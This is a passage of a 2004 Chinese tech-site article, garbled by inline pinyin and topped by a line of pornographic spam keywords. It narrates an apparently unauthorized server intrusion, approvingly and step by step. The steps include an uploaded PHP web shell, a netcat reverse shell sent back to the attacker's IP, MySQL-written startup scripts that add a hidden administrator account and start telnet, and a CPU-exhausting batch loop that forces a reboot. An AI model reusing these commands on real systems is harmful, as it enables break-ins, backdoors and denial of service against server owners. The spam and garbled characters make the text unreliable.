久久―日本道色综合久久,亚洲欧美精品在线,狼狼色丁香久久婷婷综合五月,香蕉人人超,日本网站黄,国产在线观看不卡免费高清,无遮挡的毛片免费

2023信創(chuàng)獨(dú)角獸企業(yè)100強(qiáng)
全世界各行各業(yè)聯(lián)合起來(lái),internet一定要實(shí)現(xiàn)!

一次系統(tǒng)艱難而真實(shí)的入侵

2004-02-16 eNet&Ciweek

  4,絕處逢生

  第2天一打開電腦,就在cmd里輸入telnet ip,返回的卻是:

  正在連接到xxx.xxx.xxx.xxx...不能打開到主機(jī)的連接, 在端口 23: 連接失敗

  當(dāng)時(shí)真的很郁悶,又想到了21的FTP,又一個(gè)思路冒出來(lái),一個(gè)serv-u,設(shè)置好密碼后在把serv-udaemon.ini寫進(jìn)對(duì)方主機(jī),最后登陸,不過(guò)仔細(xì)想想還是不行,因?yàn)镸YSQL導(dǎo)出的文件不能覆蓋其他文件……

  不行,我還是不能放棄,我把注意力轉(zhuǎn)移到MYSQL的數(shù)據(jù)上,仔細(xì)搜索,發(fā)現(xiàn)一個(gè)“wangzhan\"的列,進(jìn)入后發(fā)現(xiàn)USER的表,看到里面有幾個(gè)帳號(hào),密碼是名文保存的,接著我聯(lián)想到網(wǎng)站上的管理系統(tǒng),于是馬上依照了第一個(gè)行的帳號(hào)登入,結(jié)果證明了我的猜測(cè),我成功的進(jìn)入了,只有發(fā)布新聞,等欄目,

  

  并沒(méi)有什么關(guān)于設(shè)置的選項(xiàng),但是我還是試了一下,點(diǎn)發(fā)布新聞,一個(gè)“上傳圖片”的框框映入了我的眼簾,我試著用它上傳phpshell,填好標(biāo)題,內(nèi)容等后,點(diǎn)了確定,另人激動(dòng)的時(shí)刻到了,我成功了,順利的傳了上去,看來(lái)終究是自己編的,竟然沒(méi)有對(duì)后錯(cuò)名做限制,出現(xiàn):

  home/photo/2013245321.php上傳成功,

  結(jié)果我通過(guò)這個(gè)路徑,得到了phpshell,當(dāng)時(shí)的心情真是無(wú)法用言語(yǔ)形容,但是我們現(xiàn)在的權(quán)限還太小,只能讀寫文件,要取道ADMIN權(quán)限才能算真正的占領(lǐng),接著我開始了提升權(quán)限……

  5,最后的決戰(zhàn)

  經(jīng)過(guò)不懈的努力,終于有一個(gè)PHPSHELL,這個(gè)小小的SHELL,整整經(jīng)過(guò)我2天的努力,最后就是提升權(quán)限了,再上傳一個(gè)NC,

  反向連接:

  back(被我改名了) myip 53 -e cmd.exe

  就是把幫定的CMDSHELL返回到我的53端口上,然后在自己機(jī)上運(yùn)行

  back -vv -l -p 53

  順利的得到了SHELL

  

  得到CMDSHELL先看看是什么系統(tǒng)

  type %windir%\\system32\\$winnt$.inf

  發(fā)現(xiàn)有win adv,這幾個(gè)字母,初步判定是win高級(jí)服務(wù)器版

  再看看他打了什么補(bǔ)丁吧,輸入:regedit /e r.reg HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\hotfix,意思是導(dǎo)出

  HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\hotfix,里面含有補(bǔ)丁的信息,但沒(méi)成功導(dǎo)出,怎么辦呢,仔細(xì)看看WINNT里面的目錄,發(fā)現(xiàn)有一些Q打頭的LOG文件,它就是打了SP后遺留下來(lái)的日志文件,用TYPE命令查看,里面有許多是SP4的文件名,很有可能打了SP4,那樣的話就麻煩了……

  首先試試WMI吧,是eyas寫的提升權(quán)限的東西,可以在SP3的機(jī)上建立一個(gè)XX的超級(jí)管理員,上傳并運(yùn)行以后,結(jié)果在我意料之中—拒絕訪問(wèn),看來(lái)真的打了SP4,這樣可就麻煩了,輸入net start,看看開了什么服務(wù),發(fā)現(xiàn)幾個(gè)可以利用的服務(wù):

  mysql

  Serv-U

  于是我開是替換服務(wù)了,但可悲的是,這兩個(gè)軟件都裝在C盤,而且C盤是NTFS,更改名字就是拒絕訪問(wèn),殺進(jìn)程就更別說(shuō)了,哎,感覺(jué)又沒(méi)有辦法了,但是我還是不能放棄!(神都應(yīng)該被我的精神感動(dòng)了吧)仔細(xì)想想,我又回到了MYSQL上面,因?yàn)镸YSQL肯定是ADMIN裝的,也就是說(shuō)隸屬于ADMIN的啟動(dòng)范圍之類,也就是說(shuō)可以利用它寫個(gè)腳本然后放在“啟動(dòng)”項(xiàng)內(nèi),于是我趕緊輸入:

  use test;

  create table 2(cmd TEXT);

  insert into 2 values (\"set wsh=CreateObject(\"\"WScript.Shell\"\")\")

  insert into 2 values (\"wsh.run \"\"net.exe user aaa aa /add\"\",0\")

  insert into 2 values (\"wsh.run \"\"net localgroup administrators aaa /add\"\",0\")

  insert into 2 values (\"wsh.run \"net start telnet\",0\")

  最后導(dǎo)出在所有USER的“啟動(dòng)”項(xiàng)內(nèi),最后就是等服務(wù)器重起了,不過(guò)俺是個(gè)急性子的人,利用messenge漏洞吧,雖然它不能得到SHELL但能使服務(wù)器重起,但仔細(xì)一看原來(lái)服務(wù)器根本就沒(méi)啟動(dòng)MESSENGE服務(wù),更別說(shuō)漏洞了……

  怎么辦呢,寫個(gè)BAT吧,內(nèi)容為:

  :begin

  start cmd

  goto begin

  也就是不停的運(yùn)行CMD,呵呵,更拒絕服務(wù)差不多,不一會(huì)CPU就會(huì)SAY GOODBYE了。

  重起之后的事就不用說(shuō)了吧……

  

  至此終于入侵完了,回顧整個(gè)入侵,幾起幾落,真的是很不容易,耗時(shí)3天,最后終于成功了,希望各位讀者們能從這篇文章學(xué)會(huì)一些有用的知識(shí),而最重要的就是要有永不放棄的精神,而且要善于分析問(wèn)題。

  

相關(guān)頻道: eNews

您對(duì)本文或本站有任何意見(jiàn),請(qǐng)?jiān)谙路教峤?,謝謝!

投稿信箱:tougao@enet16.com